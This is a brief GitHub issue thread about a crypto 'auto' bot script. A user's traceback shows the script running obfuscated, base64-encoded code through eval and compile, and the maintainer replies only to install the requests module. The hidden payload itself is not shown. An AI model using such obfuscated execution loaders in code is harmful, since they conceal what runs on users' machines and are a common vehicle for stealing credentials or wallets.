### ISSUE TITLE
Error?

### ISSUE THREAD

**Issue by NashrifZMgs** [tudineroweb/EsBTCv3#2]
Traceback (most recent call last):
  File "/storage/emulated/0/AllScript/Website/Auto/EsBTCv3/bot.py", line 11, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
  File "<string>", line 2, in <module>
ModuleNotFoundError: No module named 'requests'

**Comment by tudineroweb** [comment]
pip install requests
